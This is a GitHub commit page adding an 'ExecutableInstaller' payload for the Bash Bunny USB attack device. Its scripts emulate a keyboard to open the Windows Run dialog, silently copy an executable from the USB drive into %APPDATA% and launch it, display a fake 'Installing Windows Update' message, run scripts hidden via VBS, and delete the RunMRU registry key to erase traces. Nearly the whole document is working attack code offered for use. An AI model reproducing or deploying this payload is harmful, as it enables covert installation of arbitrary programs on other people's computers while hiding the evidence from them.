-
Notifications
You must be signed in to change notification settings - Fork 1.5k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #11 from IMcPwn/executableinstaller
Add ExecutableInstaller payload
- Loading branch information
Showing
5 changed files
with
77 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
@echo off | ||
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" | ||
cscript %~dp0\i.vbs %~dp0\e.cmd | ||
@exit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,23 @@ | ||
@echo off | ||
@echo Installing Windows Update | ||
|
||
REM Delete registry keys storing Run dialog history | ||
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f | ||
|
||
REM Below is for copying a directory with a payload inside the root directory of the Bash Bunny USB Mass Storage. | ||
REM echo d | xcopy /C /Q /Y /E %~dp0\..\..\PAYLOAD_FOLDER_IN_ROOT %APPDATA%\PAYLOAD_FOLDER_IN_ROOT | ||
|
||
REM Copy payload.exe from the root of the bash Bash Bunny USB Mass Storage (change to whatever you like). | ||
copy %~dp0\..\..\payload.exe %APPDATA%\payload.exe | ||
|
||
REM Below is for executing a payload inside a directory (see comments above). Change --startup to whatever parameters you wish to pass (or remove it). | ||
REM start "" "%APPDATA%\PAYLOAD_FOLDER_IN_ROOT\payload.exe" --startup | ||
|
||
REM Launch payload.exe with the startup parameter. Change --startup to whatever parameters you wish to pass (or remove it). | ||
start "" "%APPDATA%\payload.exe" --startup | ||
|
||
REM Blink CAPSLOCK key (from usb_exfiltrator) | ||
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" | ||
|
||
@cls | ||
@exit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,22 @@ | ||
#!/bin/bash | ||
# | ||
# Title: ExecutableInstaller | ||
# Author: IMcPwn | ||
# Version: 1.0 | ||
# Target: Windows 7+ | ||
# | ||
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, | ||
# which in turn executes e.cmd invisibly using i.vbs | ||
# which in turn copies payload.exe from the root of the Bash Bunny and then executes it | ||
# using the --startup parameter. Change these settings inside of e.cmd. | ||
# | ||
LED R | ||
ATTACKMODE HID STORAGE | ||
QUACK GUI r | ||
QUACK DELAY 100 | ||
# TODO: Verify $SWITCH_POSITION | ||
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\$SWITCH_POSITION\d.cmd')" | ||
QUACK ENTER | ||
|
||
# Green LED for finished | ||
LED G |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
# ExecutableInstaller for Bash Bunnys | ||
|
||
* Author: IMcPwn | ||
* Version: Version 1.0 | ||
* Target: Windows | ||
|
||
## Description | ||
|
||
Copies an executable (or executable in a directory) from the Bash Bunny USB Mass Storage | ||
to %APPDATA% and then executes it with the --startup parameter (or whatever parameter you want). | ||
|
||
## Configuration | ||
|
||
By default the staged payload copies the payload payload.exe from the root of the Bash Bunny, rename this to whatever you like inside | ||
by editing e.cmd. | ||
The payload copies to %APPDATA%, change this to wherever you like by editing e.cmd. | ||
You may also copy a payload inside a directory, see comments in e.cmd. | ||
|
||
## STATUS | ||
|
||
| LED | Status | | ||
| ------------------ | -------------------------------------------- | | ||
| Red | Attack Setup | | ||
| Green | Attack Complete | | ||
|
||
## Discussion | ||
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Hak5 Forum Thread") |